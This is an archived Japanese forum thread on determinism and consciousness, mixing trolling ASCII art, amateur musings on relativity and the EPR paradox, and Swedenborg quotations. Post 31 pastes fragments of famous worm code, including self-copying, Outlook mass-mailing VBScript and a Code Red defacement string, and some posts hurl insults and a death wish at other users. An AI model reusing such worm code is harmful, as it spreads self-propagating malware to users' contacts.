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2012年1月1期哲学17: ◆決定論:脳は物質だから意識は必然に過ぎない188◆ (460)
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◆決定論:脳は物質だから意識は必然に過ぎない188◆
1 :11/12/22 〜 最終レス :12/01/03 人間の脳が「物質」であることには、誰も異論がありません。 しかし、脳内には物質以外の「何か」がある(筈)と考える人が居ます。 ・・それは願望思考・自己欺瞞という「観念論的誤謬」です。 人間の脳を構成する千億個の神経細胞は軸索を伸ばし、突端から 分泌する神経伝達物質で、他の神経細胞に情報を伝えるだけです。 勿論、脳内には核分裂のような原子核反応もありません。 分子生物学と生理学の対象分野「分子レベルの現象」が全てです。 「この宇宙」で人間の脳だけが「特殊な物質」であるとする科学的根拠は 全くありません。人間の脳も地球上における「物質の進化」の一過程に すぎず、人間の脳が造り出す『意識』も何ら「特別」ではありません。 『意識』は『クオリア』を持つ動物全部に生成する現象です。 「何を思うか何を意志するか」は、あらかじめ物理・化学法則により 決定されております。自由(意志)感は文字通り『感じ』にすぎません。 量子論の「不確定性」は意識には何の関係もない「単なる観測問題」です。 以上が「超・大統一理論」=量子論と相対性理論の統一後に残存し得る 『唯一の最終真理(思想)』の輪郭です。全宗教全観念論は徒労です。 ◆決定論:脳は物質だから意識は必然に過ぎない187◆ http://awabi.2ch.net/test/read.cgi/philo/1318312714/
2 : / // /| / // / / | // / / // / `'ー-‐''" ヽ、_ / _,. -――――‐- // /. ‐ ´ / ` 、 / ァ っ も 〈 、 . ! _,. -――一ゝ. / ァ て う .| \\ │ , ´ : : : : : : : : : : : : : : \ / | 約 イ ヽ \\ |/ : : : : : :!: : : ハ: : : : : ! : : : : \ // | 束 カ >//|\/ : : : : : : :/,|__ノ` !: : : :ハ: : :|: : : :\ | し ス / / ! /: : :!: : :О: :/,ィ≠ミ、 \/`\!_:イ.: :厂`` | た レ | /|/ : : :|ヘ: : : 〈ヵ rリ ,.ァ=;、|: : / / / | じ は |О゜/: : : : { | : ∨0゚´ ̄ ト i 〉ハ/! // / / ッ ゃ 立 | 。/: : .: : :.\i! : : │"u ' `'゜o O // / ! ! な て ',/: : : :/: : :.| : : : | ,. --- 、 " j: :│ ゜ /:\ / イ な \.: :/: : : : :,| : : : l ! 〉 / : : | <: : : : : > カ い /,.',_:_:_: ン│: : : ト . ゝ__.ノ イ |: : : | "\: :\ ァ /,./  ̄ ̄ \ ! : : : | / 、 ヽ、.: : :l: :.i. : : .\_ _ _ /: /
3 : ________ ドンドン |:::::::::::::::::::::::::::::::::::::::|| |: ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:| |:___________:| |:::::::::::::::::::::::::::::::::::::::|| |:::::::::::::::::::::::::::::::::::::::|| < 純一いるんじゃろ? |:::::::::::::::::::::::::::::::::::::::|| |::::::::::::::::::::::::::::::::: O|| ドンドン |::::::::::::::::::::::::::::::::::::::.|| |: ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄:| |:___________:| |::::::::::::::::::::::::::::::::::::::.|| |:::::::::::::::::::::::::::::::::::::::||  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ /;;;;;;;;;;;:;:;;:;:;' ___/n:∩nnn∩:\ < i__〉f|||∩| | |^! !n\ <_i_,_〕∩nー∵;,-─.| | || __ <_t_,_〕 ≼⓪≽_)、〈.≼⓪≽_)〈__i_> . <_t_〕 `ー一' '、'ー‐' 〔,_i_> |;;;;\\UU、__l__, UU〔,_t_> ヽ;;;;;;;\\'''----''/〔,_t_> \;;;;;;;;ヽr>ニニニ<r');/ ;:;;:;:;;:;;:;:;;;;;;;;;;;;;;;;;;;;;;;;;/ バレとるんじゃよ?
4 : >>1 君さぁ・・・ 決定!!ドン!!!ってやらないと不安で仕方ない人? 科学的根拠とか「現時点では」だろ? 脳はまだまだフロンティアだぞ?いっとくが 脳科学なんて全然すすんでねーのに決定論なんて立てられるわけないだろ それなのに今とっとと決定論を立てたい!!はいこれ!!!ドン!!! ってのは暴論だろ まぁどうしてもそういうものを立てたいのなら 世に送り出してみたら? こんなネットの端っこじゃなくてさ 送り出して、色々な反論に打ち勝ってそれでも生き残るのであれば 君の決定論とやらは正しいんだろうよ 君のは真理とか決定論というより「思考停止」だよ 君はただとっとと決定論を出して考えるのをやめたいだけなんだ
5 : >>4 脳科学が進んでないと非決定なんですか〜w
6 : 色々な反論<具体的に
7 : _,,..--――--,,.. /::: \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ / \::.| ト‐=‐ァ' |:./ なんですかな? \\__// / ヽノ ⌒\__ .___ / | \___)⌒\ |\ \ ` ̄\ \ -''' ⌒(___) \| ̄ ̄ ̄| \ /\ \__ .  ̄ ̄ ̄ ` ―─―─´ ヽ___)
8 : 決定論じゃなかったら おっかなくて 原発で発電したり有人ロケット飛ばしたりなんてできない 脳だけが例外と考えるなら別だけど
9 : 320 :名無しさん必死だな :2007/09/13(木) 18:48:27 ID:+/gBGOOJ0 >プんまんどしどしどしぁwどしぁwだぞぁwどしぁw 「オナラしたら実まで出ちゃったんで、もうヤケになって全部出した」みたいな擬音だな 322 :名無しさん必死だな :2007/09/13(木) 18:51:45 ID:d533wxqY0 >>320 ∧_∧ ( ´・ω・) //\ ̄ ̄旦\ // ※\___\ <ブリュッ \\ ※ ※ ※ ヽ ∧_∧ (´・ω・`) 実が出た //\ ̄ ̄旦\ // ※\___\ \\ ※ ※ ※ ヽ ∧_∧ ( ´・ω・) とりあえず最後まで出すか…… //\ ̄ ̄旦\ // ※\___\ <プんまんどしどしどしぁwどしぁwだぞぁwどしぁw \\ ※ ※ ※ ヽ
10 : 人i ノ:;;,ヒ=-;、 (~´;;;;;;;゛'‐;;;) ,i`(;;;゛'―---‐'ヾ ヽ;;';ー--―-、'';;;;;゛) /::: s yohane \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ ウエッヘヘヘッ 誰か呼びましたかな?ウヘッウヘッウヘェ〜♪ . \ `二´ '/ ,r――--、,,_ノ r、 三 η L___,,..-―‐-、 ( 〃ヽヽ //ヾヽ ) ヽ `ヽ、 ⊂ニmy godニ⊃ ,r'' / ヽ } ` ー-ヾヽ// ヽヽ〃ー‐''7 / ヽ .{ ι' 三 ヽ) {. /
11 : 寒いときは寒いって言わないと風邪ひく
12 : 物騒なことはおやめなさい。 おいおまえ! ハート様とジャギを足して2で割ったようなお人の名を言ってみろ!
13 : いつのまにか建っとるじゃないか あぶなく俺が建てようかしら なんて魔が差すところであったわ 2ゲットを逃したばい
14 : 人i ノ:;;,ヒ=-;、 (~´;;;;;;;゛'‐;;;) ,i`(;;;゛'―---‐'ヾ ヽ;;';ー--―-、'';;;;;゛) /::: s yohane \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ ウエッヘヘヘッ それではスウェーデンボルグの話でもするかね♪ . \ `二´ '/ ,r――--、,,_ノ r、 三 η L___,,..-―‐-、 ( 〃ヽヽ //ヾヽ ) ヽ `ヽ、 ⊂ニmy godニ⊃ ,r'' / ヽ } ` ー-ヾヽ// ヽヽ〃ー‐''7 / ヽ .{ ι' 三 ヽ) {. /
15 : ≼◉≽
16 : なんだかんだで年末になると古参どもが集まるのだろ 私ももうここに来て4年になるが古参ということになるのかな
17 : おれは2000年からここにいる 寂しいかなストレス発散は2ちゃん いるがだいたいコテもたないのでコテと面識はない
18 : ___ /ヨハネ\ / ─ ─ \ / (●) (●) \ | (__人__) | <機械はどうした、勝負しろ機械! オラ!こいオラッ!! ,.゛-‐- 、 `⌒´ ,/ ┌、. / ヽ ー‐ <. ヽ.X、- 、 ,ノi スエ教 ハ ⊂>'">┐ヽノ〃 / ヘ 入 ´// ノ } ,..,.._',.-ァ / `ー''"´ ,' c〈〈〈っ< / __,,..ノ ,ノヽー'"ノ { ´ / ``¨´ /´¨`'''‐、._ ,'\ ∨´ `ヽ、my god ノ ゛ヽ ∨ ヽ _,,..-'" `ヽ ∨ 〈-=、.__ } ヽ、 } ``7‐-. / ヽ リ /′ ノ /′ , { / / { ! ,ノ ,/′ ! / / `‐-、 ! ,/ ゛ー''' ー---' ', / { } ゛Y `ヽ、 ゛ー--‐
19 : 昨日まで某メーカの冷蔵庫工場で働いてたんですが まあ派遣労働者です。 そこは社員従業員と派遣従業員とは人数にして半々ぐらいだったんですが 派遣はだいたい20〜40代が中心ですが、社員はほぼ50〜60代です。 びっくりするぐらい加齢臭全開でしたな。 ほんと日本の製造業は終わっとる、 と言っていいのか、いやこれこそが新生日本の姿なのか。。。 しかしこの爺さん婆さんどもが元気なのがまたびっくり。 昔の人はよく働くね。
20 : >>17 俺もここでストレス解消してるな しかし悲しくはないぞ むしろこの時代遅れらしいツールで遊ぶ自分を誇りに思うぞ
21 : >>20 まあ昔は非常に哲学の話題が広かったが いまはあのころいた人間はどこいったのか いまは太陽のひかりの射すところを求めてるに すぎない…おっとこれはあの人との秘密だ陽
22 : >.21 んー 貴方が太陽になればよいではないか みんなが求める太陽ってヒールでしょ? 暴れてくれる人を待望してるのだろう。 俺もいっちょ暴れてみようとしてみたりするのだが いかんせん根性が無くてな 中途半端に妥協するわけだ。 いったん自我の鎖を解いて暴走すると行くとこまで行くしかない。 そして自らの発言内容の幅を狭めてしまう。 そうするとキャラごと消えるしかない。 やはり太陽になるのは大変だな 月でいいではないか
23 : サロクに栄光あれ それでは
24 : 決定論スレってクリスマスに自の話題で炎上してた事があったな 最悪の糞スレだ
25 : ∩n:∩nnn∩ nf|||∩| | |^! .!nn nn∩nー∵;,-─.| | |^! __ イ く● _) .、〈.く●_)、_ / / ( `ー一' .'、'ー‐' ヽ)ヽ、 勉強の成果があらわれておるようじゃな? / \\UU、__l__, UU// ヽ / \\'''----''// ', j ヽr>ニニニ<r') t
26 : おはようごさいます わたくしもいい歳になりましたが未だに独身彼女なし 今年のクリスマスも実家で早く眠ります。ああどうかみんな不幸に なりますように。ではまだ今年仕事がのこっていますので
27 : _,,..--――--,,.. /::: \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ 人生を浪費したいんじゃろ? \\`二´'// /⌒\/⌒\_/ / ~~`il|||lir'''"~ヽ <_∧/ へ \__ノ ノ / | | ヽノ⌒\_/⌒\/⌒\ /⌒ヽ_ノ / /⌒\ / ヘ \ \ノ⌒\\_//⌒ \ヽ/ヽフ / /\_ / / /、 `´ /⌒ヽ )ヽ \ ヘ \ ノ ヘ y⌒\ <_ノ <_ノ \__ノ <_ノ \_フ\_フ_ノ \_へ_フ
28 : ∩n:∩nnn∩ nf|||∩| | |^! .!nn nn∩nー∵;,-─.| | |^! __;;;;;;;-=◎=- ;;;;; -=◎=-;;;;;; / / ( `ー一' .'、'ー‐' ヽ)ヽ、 向精神薬を一日15錠飲 / \\UU、__l__, UU// ヽ んでも足りないんじゃな? / \\'''----''// ', j ヽr>ニニニ<r') t
29 : _,,..--――--,,.. /::: \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ / \::.| ト‐=‐ァ' |:./ なんですかな? \\__// / ヽノ ⌒\__ .___ / | \___)⌒\ |\ \ ` ̄\ \ -''' ⌒(___) \| ̄ ̄ ̄| \ /\ \__ .  ̄ ̄ ̄ ` ―─―─´ ヽ___)
30 : 脳内現象の観察から意識現象の全てを読み取るのは無理。 意識現象は実体験を必要とするけど、実体験の観察は実体験ではない。 実体験ができたとしても動因が説明されたわけではなく 体験しただけで因果関係を説明したことにならない。 そして最近俺は下痢気味だ。到底無理だね。
31 : Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS") C.Copy(dirwin&"\Win32DLL.vbs") document.write("<body onload=window();>") If UngaDasOutlook CreateObject("Outlook.Application") DasMapiName UngaDasOutlook.GetNameSpace("MAPI") For y = 1 To DasMapiName.AddressLists.Count Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count BreakUmOffASlice.Recipients.Add Peep If x > 50 Then oo = AddyBook.AddressEntries.Count show anyone else BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If GET /default.ida c:\notworm LMTH Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html>
32 : 宗教哲学的ブログ http://jbbs.livedoor.jp/bbs/read.cgi/netgame/2891/1318766673/18
33 : 人i ノ:;;,ヒ=-;、 (~´;;;;;;;゛'‐;;;) ,i`(;;;゛'―---‐'ヾ ヽ;;';ー--―-、'';;;;;゛) /::: s yohane \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ ウエッヘヘヘッ 明日は性なる日じゃよ♪ペロペロリンチョン ♥ . \ `二´ '/ ,r――--、,,_ノ r、 三 η L___,,..-―‐-、 ( 〃ヽヽ //ヾヽ ) ヽ `ヽ、 ⊂ニmy godニ⊃ ,r'' / ヽ } ` ー-ヾヽ// ヽヽ〃ー‐''7 / ヽ .{ ι' 三 ヽ) {. /
34 : 久しぶりに来たよお。
35 : 誰もおらんが なんか語ってけ記憶くん
36 : サロクて東京に住んでる?
37 : いや いまは京都だな
38 : しょうがないから俺がつまらん話を一席ぶつかね
39 : 京都?京都は実家?
40 : 〜同時性とはなんぞ〜 相対性理論の解説本なんか読みますと、必ず「同時性」についての話があって あたくしなんか中学生の頃にもう目が回るような衝撃を受けたような気がしますな。 これって 「離れた場所で起こる複数の事象が同時か同時でないかは観測系と観測対象との間の相対的な運動状態に依る。」 ぐらいの話だと思うわけですが、直感的にもおかしいが、よく考えるとやっぱりおかしい。 この言い立てだけでは不十分のような気がするわけです。
41 : >>39 いや、19歳からずっと独り暮らしだな ついでにその話に乗っかると、私は何年も親とは音信不通だったんだが その間に親は生きてるか死んでるか分からん訳です。 しかし去年久しぶりに母親に会いましてな。やっぱり生きてた訳です。 何が言いたいかというと、 「俺が生きていた全てのあのときこのときに、やっぱり母親も生きて生活していた」 と判断することは、至極妥当な推論であり、それ以外に考えようがないわけです。
42 : 「同時性の相対化」の話はですね ざっくり言ってしまえばこういうことです。 光速度不変の原理に従うならば、光が1光年の距離を往復するのには2年掛かるわけです。 まあ、そう1光年をそう定義したんだから当たり前なんですけど。 で、これは「観測系および観測対象の運動状態には依らない」としてるわけです。 でですな、ここからトリックなんですが。観測系Xから離れた場所で起こる事象Aが観測系Xにとって「いつ」であるかを 光速度に従って「決める」ことができる、とするわけです。 簡単にいいますとね、地球から光線を出して、遠くの鏡に反射させて地球に戻すとするでしょ。 この光が鏡に反射される時刻は、光が往復する時間の丁度「中間」に相当すると判断するわけです。 で、この時刻・時間は、観測系である地球の時間をものさしとして使う。 なので実はこれってのは、 「地球のある事象(例えば時計の示す時刻)に対して、 それと同時であると判断する事象を宇宙の各地点に於いてそれぞれ決めることができる」 と言っているわけです。 つまりですね、観測系のある事象に対して同時な事象の存在を“前提”としながら、 しかし、絶対的に同時な事象というものは決められないのだ、なんていうなんとも珍妙な話なのです。 なんかおかしい。 言いたいことが分かってもらえますかね? しかし相対論は間違っていない。 なんせ有効に機能するのだから。 おかしいのは世界認識というか哲学の方なのだね。 どこがおかしいのか?それは知らん。 まあ多分、「おかしいのはお前の頭だ」とすぐに言われるだろうが。はっは
43 : _,,..--――--,,.. /::: \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ / \::.| ト‐=‐ァ' |:./ イカ臭いですかな? \\__// / ヽノ ⌒\__ .___ / | \___)⌒\ |\ \ ` ̄\ \ -''' ⌒(___) \| ̄ ̄ ̄| \ /\ \__ .  ̄ ̄ ̄ ` ―─―─´ ヽ___)
44 : イカ臭さは初版が出てまもなく修正された。 第二版からは栗の花の臭いと言われるようになった。
45 : 下僕なヨハネはやっと去ったの?
46 : >>34 > 久しぶりに来たよお 糖質は直ったか?
47 : シュレディンガーじいさんに箱に入れられてた私は居眠りしてたけど 半死半生の状態じゃなかったよ 居眠りで意識は半眠半醒だったけど おらが入ってた箱は放射線てやつ?出なかったみたいだから生きて出てきたわけ。 シュレじいさんに半死半生だったか?って聞かれたから「ニャーゴ」て答えといた。 じいさん第2号も考えてたようだが、ばかばかしくてやめたみたいだ。
48 : ネトウヨ「韓流が家政婦のミタにボロ負け、在日冷えてるかー?」 一般人「ミタのスポンサーは花王だぞ http://ikura.2ch.net/test/read.cgi/news/1324634760/
49 : 起きろ埼玉県ふじみ野
50 : _,,,,_ /´  ̄`ヽ, / 〃 _,ァ---‐一ヘヽ i /´ リ} | | ‐-=・=-ー | | 〉. -‐''~ ~'''ー {! ゝ i、 ` `二´' 丿 大きな物語は終焉したんじゃよ? r|、` '' ー--‐f´ _/ | \ /|\_ , -''" ̄⌒ヽ, , `又´``ー;;7''~´`丶、  ̄ ̄ ̄ ( ,--一''" ~`〜〜''"~ ー--、 ) ___ | 〈 〉 |  ̄ ̄ ̄ | } { | ___ | | | |  ̄ ̄ ̄ . | | | | _/ { } \_ (__,-、__} {__,-、__) `┻━┻ ┻━┻"
51 : 2000年春にいつものところにいくと… そこにはいつものものがなかった
52 : うららかな春。僕のものがない。僕はそれを一生失ったのか
53 : >>42 そっち方面では、抄録さんのほうが圧倒的な知識と思考力を持っているので、 突っ込むのは何なんだけれども、それが小生の任務なので…w 酔いにまかせて、文系の粗雑な解釈を披瀝すると… まず時間=空間という思い込みがある。 これらは、或る一つの事態(モノ)の二つの“相”を指している。 どちらも感覚することはできない。が、それを思惟(概念化)することはできる。 容易に得られるのは「同一の空間(場所、位置)はない」という認識。 空間は差異の連なりであり、当然、空間の別名・時間もまた差異の連続。 同一空間が存在しないように、同一時間(同時)も「ない」という結論になる。 これが日常世界(マクロ)における時間と空間の意味だが、この常識は量子(ミクロ)の 領域では崩れる(らしい)。そこでは一つのモノが複数の位置を占める、すなわち“同時” が現出するらしいのである。
54 : 久々に宇宙とか相対性理論の本を読みたくなってきた
55 : _,,..--――--,,.. /::: \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ / \::.| ト‐=‐ァ' |:./ なんですかな? \\__// / ヽノ ⌒\__ .___ / | \___)⌒\ |\ \ ` ̄\ \ -''' ⌒(___) \| ̄ ̄ ̄| \ /\ \__ .  ̄ ̄ ̄ ` ―─―─´ ヽ___)
56 : >>42 のようなレスは ぶちゅり学の成果から インスピレーションを受け そしてまた ぶちゅり学の言語をもちいた アナロジーへの志向 を あからさまにしているわけだけど アナロジーであるにもかかわらず そこで充足できずに つまづくってことは その問題は ぶちゅり学の言語の習得不足 ていう方向にしかころばないわけだ けっきょく>>42 のようなレスポンスは なにを もとめてるかっていうと ぶちゅり学にめちゃ詳しいひとの わけわからんけど権威があって信頼できる言葉で 間違いを訂正されることを もとめてるわけだから けっきょくけんい主義なんだよね ぷぷーっ
57 : 日が暮れますね
58 : ゲームさん来てくれましたわ
59 : >>58 >>56 に反論できませんか
60 : 今日はクリスマスイブということで街の様子を見に出かけてみました。 震災を意識してか、やっぱりいつもの年よりも全てが地味な印象ですな。 それでもちらほらとカップルが散見できました。 ちょいぶっさいくな女の子が精一杯おめかしして、これまたちょいぶさ男と手を繋いでいるのなんか見ると 微笑ましいですなw 美男美女のカップルにはあまりときめきませんが。。 去年のクリスマスイブも2chしてたような気がするな あたくしも進歩ありませんなw
61 : >>60 >>56 に反論できませんか
62 : >>59 いまからしたるからあせるな塩なめくじ 順番だ順番
63 : >>53 私は知識なんか全然無いんですよ。 趣味というか、下手の横好き?というか、学者への憧憬というか。 ここじゃ偉そうにしてますけどね。 私がそこで考えたのは、 貴方の言われる「同一の(時)空間は無い」という認識はしかし、 任意の異なる地点の「同時」の存在要請を消し去ることはできないのだ、 ということなんですよ。 ここから100万光年離れたところで起こるある事象というものがあるとしますでしょ。 その事象が「いつ」であるのかを決めようとすると、それは観測系(の運動状態)に依存する。 しかしそれが「いつか」であることを設定しようとする思考形式は理論の最初から組み込まれており いかなるものをもっても相対化できないのではないのか・・・ぐらいのことです。 仮に100万光年先に恋人がいたとして、生きてるか死んでるか分からん。 しかし尚、「“同じこの時”を彼(彼女)は生きている(かもしれない)」との認識は、 相対論をもってしても「それはちがうんだよ、こうなんだよ」と説明できない事態なのだ ってことです。 哲学的ですなぁw
64 : >>56 ほぼおまいさんの言うとおりだ。 私は恐らく反論と訂正を求めている。 ただ一方な、私は謙虚なふりをしてるが傲慢なのだよ。 哲学者の言うことはだいたい胡散臭いと思ってるのだ。 また科学は有効ではあるが科学者の世界認識は素朴で楽観的すぎる、 とも思うわけだ。道楽的に挑戦してるのだよ。 そのモチベーションを維持するのに2chというツールが適度に刺激的なのだ。 なぜならおまいさんみたいな奴も現れるから。はっは 貴方、コテ収容所に篭もって思索するのかと思ったが、ここへ住む気かね。 歓迎するぞw
65 : 何かクリスマス意識しすぎな気がしますよw まああれですな。ひとりで街でるとかなり寒いですな 特に男がひとりでそとに出てると
66 : まったく今日は寒いな おまいさんは独身を意識しすぎだぞ波平4 まあ独り暮らしの俺は気楽に世間を見れるという面はあるがな
67 : (( (ヽ三/) (ヽ三/) )) (((i )__ ( i))) / /⌒ ⌒\ \ ( /= =-:',:.-= =-\ ) /::::::⌒(__人__)⌒:::::\ ププキ?がャーッハッハーヒャヒャプキ?ヒャャーー ? \ "ー=〓=-.'` / , -''" ̄⌒ヽ, , `又´``ー;;7''~´`丶、  ̄ ̄ ̄ ( ,--一''" ~`〜〜''"~ ー--、 ) ___ | 〈 〉 |  ̄ ̄ ̄ | } { | ___ | | | |  ̄ ̄ ̄ . | | | | _/ { } \_ (__,-、__} {__,-、__) `┻━┻ ┻━┻"
68 : まあ実際そう気にもしてない ただ街にでると相対化された自我が自分の置かれた状況を認識させる
69 : うむ 私は今から年賀状を書く そのあと一席ぶつ 塩なめくじはどうした
70 : 高い志をもって生きようとしてこのざま
71 : / ─ ─\ (;;;;;;; / -=・=- i、-=・=-\ ) ;;;;) | ,ノ(、_, )ヽ |/;;/ \ "ー=〓=-'` ━・' ´\ / 向精神薬の副作用で頭 /∴∴∴∴:∴\ がおかしくなったのかね? /∴∴|_/∴:∴\
72 : EPR問題と決定論〜「同時」は妄想か信仰か形式か実在か〜 ゲームさんが「ミクロに於いて“実在的に”現出する同時」に言及してますので それに乗っかってちょっと一席ぶつわけです。 EPR問題なんてのを問題として認識したのは3〜4年ぐらい前です。 問題の存在自体はもっと前から知っていたようにも思いますが、惚けちゃって思い出せません。 それについて調べてみようと思ったのはこのスレに来てからです。 解説本なんかを読んだ時には私もわけが分からなくなりましたが、今でも大して分かりません。 上手く説明できる自信も無いが、この過疎ぶりなら少しぐらいの蛮勇も許されるでしょ。 年末の酒の肴ぐらいになればいいけど・・
73 : アインシュタインらによるいわゆるEPR論文では電子のスピンをネタにしてるようですが アスペの実験に沿って光子の偏光をネタにした思考実験に変えて語るとですね。 まず「エンタングル(絡み合い)状態の一対の光子」を作るわけです。 これはどうやって作るかというと、カルシウム原子にレーザーを当てて電子を励起させ、 この電子が基底状態に戻るときに一対(つまり二つ)の光子を発生させるわけです。 この二つの光子は“一つの事象を原因として発生した一対の光子”であって、 保存則によって(詳しくは知らん)「相互に関係する偏光状態」にあるわけです。 しかしその偏光状態がどんな状態であるかは、量子力学によれば「観測するまで原理的に“決まらない”」。 量子力学によれば、観測前の光子の偏光状態について「確率的な分布」しか存在しないことになっている。 ところがこの二つの光子を互いに反対方向に飛ばすとして、一方の光子の偏光状態を観測すると、 もう一方の光子の偏光状態はそれとの相関により決まってしまうはずである。 それなら各光子の偏光状態は原理的に確率的なんじゃなくて、本当は決まってて、分からないだけだろーが! 量子力学は不完全だ!!てのがEPR論文のだいたいの主張なわけです。 実際EPRをwikiで調べますと、EPRは決定論を支持するようなことも書いてます。 しかしそんな単純にはいかない。
74 : 上で言う二つの光子がそれぞれに実在するとして、一方の光子の偏光状態を測定すると その光子と対として誕生したもう一方の光子の偏光状態は決定する。 これは常識的に考えれば、光子の偏光状態は観測前には既に決まっていなければ駄目だろう、と思える。 ところがよく考えてみると、それは不可避な条件とは言えない。 つまりですね、この二つの光子はセットで量子状態にあるとするわけです。 なので、この二つの光子の偏光状態は観測まで決まっていないが、しかし 相互に関係すること“だけ”は決まっている(即ちエンタングル)とすることで パラドクス的な事態を回避できるわけです。 実際、「本当は決まっている」と主張するいわゆる「隠れた変数の存在」論は アスペの実験によってベルの不等式条件が確認されて否定される。 ※ベルの不等式の正当性は俺には分からん。誰か語れる奴おらんか? しかし尚、「いやそれは局所的な隠れた変数が否定されただけで、非局所的な変数はあり得る。」 とかいう奴もいるわけですが、何ですかねその「非局所的な隠れた変数」とは?
75 : こう想定できる 「エンタングルする二つの実体には同時が実在(内在?)している。」 同時は“実在”するか? と問われれば、認識論的には「それは形而上学でしかない」ということで一蹴されるかもしれない。 しかしながら、「理論的に同時が実在していなければ困る」事態があるとするならば それはやはり要請されなければならない。 同時の何が「同じ」なんだ?検証可能どころか、それを理解可能とする“条件”なんてかねーだろ? という反論にはこのように応えます。 「それは要請されるのである」 また揺蕩ってしまったか・・
76 : おーいスモー 怒っていいぞ〜 俺は書き逃げするからな〜
77 : くんくんしたらあかんえ などと若者をたぶらかす言説を振りまきながら、 ヒキコハンニバルがいつものAAで荒そうとしている。 以上が「超・大統一理論」=量子論と相対性理論の統一後に残存し得る 『唯一の最終真理(思想)』の輪郭です。全宗教全観念論は徒労です。 すなわち万物の根源は砧佐古滋であって、これを解明しない限り哲学に未来はない。 ,,-――-、 ,/ \ ./ ...-ー、,-─ . l | .-=・=- i、-=・=-.| | / ー-' ヽ / \ ヽニソ ,/ 本日は脳内睡眠物質の蓄積により就寝させて戴きます。 / `、 / ((i)) \
78 : ワトソン:ブルネルス、久しぶり。サンタさんからのプレゼントだ。 ウィルソン・ヴァン・デュセン/『霊感者スウェデンボルグ』/P190 「彼らは性的なこととか汚いことに気持ちを向けさせようとするが、このことも スウェーデンボルグはいっている(霊界日記2852)。そして、彼らはそんな ことに気持ちを傾けたといってまた人間を非難するのだ。彼らはまた人間は単な る自動人形や機械なのだという意味のことをいったりもする。」 「人間が自動人形だという考えは精神病的な妄想には共通の幻想で、幻想の中で起 きるものである。普通の状態では霊には人間の世界のことは見たり聞いたりでき ないが、精神病などの中では彼らにはそれができるようになるということはスウ ェーデンボルグもいっている(天界の秘義1880、霊界日記3963)。」
79 : ホームズ:ワトソン、ブルネルスの言っていることはある意味で正しい。 霊魂が死んでいる人間は機械のようなものだ。 マリア・ヴァルトルタ「手記」抜粋/天使館/P54 「現在、人類は骨、石灰化した、重苦しい、死んだ悪徳と異端の悪臭を 放つ畝溝(うねみぞ)の深みに沈んだ廃墟にすぎない。そこにはもはや 霊は無い。肉のなかの生命であり、永遠のなかの生命である霊魂は無い。 人間を動物から区別する霊魂は、もはやそこに無い。人間は最良の部分 において自分自身をしてしまった。人間は一台の機械か? 獣か? 死骸なのか? そうだ、人間はこれらすべてだ。」
80 : 「人間はエンジンを始動させてその部品を無理やり働かせなければならな いので、働く装置の自動性でその一日を終了するから機械だ。しかし自分 がしていることの美しさを理解せずにそれをしている。人間も起き、食べ、 働き、散歩し、おしゃべりをしたあとで寝る。その美において、あるいは 醜さにおいて為すことを、ついぞ理解することがない。なぜなら端的に霊 魂が欠けていて、もはや美を醜から善を悪から区別しないからだ。」
81 : 「人間は一種の獣である。というのも彼は眠り、食べ、身体には脂肪を、 ねぐらには食糧を蓄えることで満足し、これらを生きる目標とし、存在す るよろこびとしている獣以上でも以下でもない。しかも彼は、こうした自 己中心的で暴力的なことのすべてを、満腹するためには掠奪することが必 要であるという、卑しく野蛮な法則によって正当化している。」
82 : 「人間は一種の死骸である。というのも一人の人間が生きていると言える のは、彼の体内に霊魂が現前しているからであり、霊魂が立ち去れば、人 間は死骸になってしまう。事実、現今の人間は、機械もしくは悪魔の魔法 にかかって立たされ動かされているほんとうに一つの死骸である。だがそ れは一つの死骸である。」 ワトソン:なるほどね。ブルネルスに理解できるかな? ホームズ:どうだろう。
83 : 5時半に起きた。何てったって昨日は9時には寝たからね 今日は仕事ですよ
84 : ワトソン:しかし、彼が人間は機械だと思っているということは、彼自身は 霊的に死んでいるということに他ならないだろう? ホームズ:まあ、そうだね。 ワトソン:生き返るかね? ホームズ:主はこの文脈をエゼキエル37章の死んだ骨の譬えの中で言われ ている。そして、主は死んだ骨を生き返らせると言っておられる。 ワトソン:なるほどね。ブルネルス、クリスマス・キャロルのスクルージの ように、君が生き返ることを祈るよ。
85 : 来る 遂にやってくる♪ 今日は有馬記念と賞金王決定戦ですな
86 : 運知思想じゃな?
87 : 第四波動、このフラグメントの仕組みはお前ら程度では理解できない、
88 : >>84 出たなカルト糞ジジイ スウェーデンボルグは精神異常者だ とっととしんでしまえ
89 : 人i ノ:;;,ヒ=-;、 (~´;;;;;;;゛'‐;;;) ,i`(;;;゛'―---‐'ヾ ヽ;;';ー--―-、'';;;;;゛) /::: s yohane \ /:::" ヽ ,i :: -=ニ=- -=ニ=- i \.. / ー-' ヽ. / \::.| ト‐=‐ァ' |.:./ ウエッヘヘヘッ スエ教では支那の土産壺を輸入して150万円で売っておるよ♪ . \ `二´ '/ ,r――--、,,_ノ r、 三 η L___,,..-―‐-、 ( 〃ヽヽ //ヾヽ ) ヽ `ヽ、 ⊂ニmy godニ⊃ ,r'' / ヽ } ` ー-ヾヽ// ヽヽ〃ー‐''7 / ヽ .{ ι' 三 ヽ) {. /
